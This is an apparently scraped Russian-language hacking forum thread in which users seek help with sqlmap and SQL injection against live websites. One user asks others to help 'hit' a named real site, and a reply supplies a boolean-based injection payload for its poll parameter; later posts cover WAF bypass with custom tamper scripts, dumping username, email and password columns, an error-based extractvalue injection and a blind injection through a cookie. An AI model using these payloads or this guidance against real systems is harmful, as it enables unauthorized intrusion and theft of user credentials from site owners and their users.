 |
|
20.06.2019, 21:45
|
|
Новичок
Регистрация: 21.01.2019
Сообщений: 3
С нами:
3848726
Репутация:
0
|
|
Подскажите как в мапе докрутить:
 |
|
|
21.06.2019, 22:55
|
|
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами:
8445343
Репутация:
0
|
|
Всем привет, кто может, помогите долбануть этот сайт:
Код:
http://wrappers.ru/?act=polls&poll=1%22%27
|
|
|
|
21.06.2019, 22:56
|
|
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами:
5738006
Репутация:
147
|
|
Сообщение от sepo
↑
помогите долбануть этот сайт
Что значит долбануть?
Привет..
|
|
|
|
21.06.2019, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от sepo
↑
Всем привет, кто может, помогите долбануть этот сайт:
Код:
http://wrappers.ru/?act=polls&poll=1%22%27
1- вы ошиблись разделом
2- там waf
3- не ясно что вы ходите. Задайте точный вопрос или опишите проблему.
Код:
http://wrappers.ru/?act=polls&poll=1"+and+substring(@@version,1,1)=5+--+-
|
|
|
|
22.06.2019, 01:22
|
|
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами:
8445343
Репутация:
0
|
|
спасибо
|
|
|
|
24.06.2019, 04:28
|
|
Новичок
Регистрация: 24.06.2019
Сообщений: 1
С нами:
3626966
Репутация:
0
|
|
Всем привет, такой вопрос - есть куча ссылок которые нужно пройти, отдаю их мапу и ухожу, как сделать чтобы уязвимые ссылки как-то помечались, потому что он в аутпут складывает все как я понимаю, без разбора, то есть все пройденные. Спасибо.
|
|
|
|
08.07.2019, 15:54
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от man474019
↑
Hi
sqlmap dumps all data in table, but I want to dump specify columns in that table, but sqlmap doesn't retrieve any data
I try --hex --no-cast tamper scripts (unionalltounion, between) but no result
What can you advice for help ?
Thanks !
Проверьте запрос в ручную на что срабатывает WAF,обходите его и пишите свой tamper под него.
|
|
|
|
08.07.2019, 20:51
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от man474019
↑
interesting is that, sqlmap dumps username column, but can not dump email and password columns..but when dump all table, sqlmap dumps normally
it happens, use the old version
|
|
|
|
02.08.2019, 12:57
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
День добрый, господа.
Есть такая скуль:
Код:
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
Где вроде как insert statement, потому что если после ' не добавить еще один параметр через запятую, то выдается такая ошибка:
Код:
Column count doesn't match value count at row 1
Подскажите, реально ли такое засунуть в мап и как это сделать? |
|
|
|
05.08.2019, 09:56
|
|
Познающий
Регистрация: 26.12.2015
Сообщений: 34
С нами:
5464406
Репутация:
2
|
|
привет. подскажите как мапу указать на то какие данные меняются? скуля слепая
в куках уязвим параметр identifyId: amplitude_idundefined={"optOut":false,"sessionId": null,"lastEventTime":null,"eventId":0,"identifyId" :027179381' or 3726=3726--,"sequenceNumber":0} я так понимаю нужно добавить --string="а вот что здесь хз"
 |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
